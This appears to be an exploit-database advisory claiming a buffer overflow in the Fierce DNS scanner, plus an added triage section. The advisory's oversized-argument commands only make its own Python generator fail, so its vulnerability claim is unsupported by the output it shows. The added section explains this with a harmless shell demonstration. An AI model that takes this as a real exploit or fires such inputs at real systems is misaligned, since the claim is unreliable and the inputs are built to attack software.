Fierce Buffer Overflow Vulnerability

2017-11-12T00:00:00
ID 1337DAY-ID-28978
Type zdt
Reporter Mojtaba MobhaM
Modified 2017-11-12T00:00:00

Description

Exploit for the Linux platform in the local exploits category

                                        
################
#Exploit Title: Fierce Buffer Overflow
#Exploit Author: Persian Hack Team
#Discovered by: Mojtaba MobhaM (MojtabaKazemi)
#Vendor HomePage: http://www.ha.ckers.org/fierce/
#Version: 0.9.9 - Beta
#Tested on: Kali
#Description: 
Fierce is a semi-lightweight scanner that helps locate non-contiguous
IP space and hostnames against specified domains.  It's really meant
as a pre-cursor to nmap, unicornscan, nessus, nikto, etc, since all
of those require that you already know what IP space you are looking
for.  This does not perform exploitation and does not scan the whole
internet indiscriminately.  It is meant specifically to locate likely
targets both inside and outside a corporate network.  Because it uses
DNS primarily you will often find mis-configured networks that leak
internal address space. That's especially useful in targeted malware.
###############################
#fierce -dns $(python -c 'print "A"*10')

	Uhm, no. "AAAAAAAAAA" is gimp. A bad domain can mess up your day.
	Try again.
Exiting...

#fierce -dns $(python -c 'print "A"*999999999999999')
Traceback (most recent call last):
  File "<string>", line 1, in <module>
MemoryError
Option dns requires an argument
You have to use the -dns switch with a domain after it.
Type: perl fierce.pl -h for help
Exiting...

#fierce -dns $(python -c 'print "A"*9999999999999999999')
Traceback (most recent call last):
  File "<string>", line 1, in <module>
OverflowError: cannot fit 'long' into an index-sized integer
Option dns requires an argument
You have to use the -dns switch with a domain after it.
Type: perl fierce.pl -h for help
Exiting...

###############################
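
Added triage example (not part of the original advisory or of fierce): in the second and third sessions above, the traceback is printed by the `python -c` generator, and the line that follows is fierce reporting that `-dns` received no argument. The sketch below uses constructed stand-ins (`target_stub`, `gen_ok`, `gen_fail` and `payload_delivered` are hypothetical names) to show what the shell hands a program when an unquoted `$(...)` generator fails, and how to confirm the payload was produced before attributing an error to the target.

```shell
#!/bin/sh
# Added triage example. target_stub is a hypothetical stand-in for the program
# under test (it is NOT fierce): it only reports what argv it was handed.
target_stub() {
    if [ "$#" -ge 2 ] && [ "$1" = "-dns" ]; then
        echo "argc=$# dns_len=${#2}"
    else
        echo "argc=$# dns_missing"
    fi
}

# Constructed generators standing in for the python -c one-liners.
gen_ok() { printf 'AAAAAAAAAA\n'; }      # prints 10 bytes, exits 0
gen_fail() {                             # dies before printing anything
    echo "MemoryError (constructed)" >&2
    return 1
}

# 1. Generator succeeds: the target receives the string as its second argument.
case_ok() { target_stub -dns $(gen_ok); }

# 2. Generator fails: unquoted $(...) expands to zero words, so the target
#    sees "-dns" alone and no oversized input ever reaches it.
case_failed() { target_stub -dns $(gen_fail); }

# 3. Same failure, quoted: the target now receives one empty argument.
case_failed_quoted() { target_stub -dns "$(gen_fail)"; }

# Triage check: did the payload reach the intended length?
# Generate first, verify exit status and size, and only then run the target.
payload_delivered() {   # $1 = generator function, $2 = expected length
    payload=$("$1" 2>/dev/null) || return 1
    [ "${#payload}" -eq "$2" ]
}

case_ok
case_failed
case_failed_quoted
payload_delivered gen_ok 10 && echo "gen_ok: payload delivered"
payload_delivered gen_fail 10 || echo "gen_fail: payload never produced"
```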

#  0day.today [2018-02-06]  #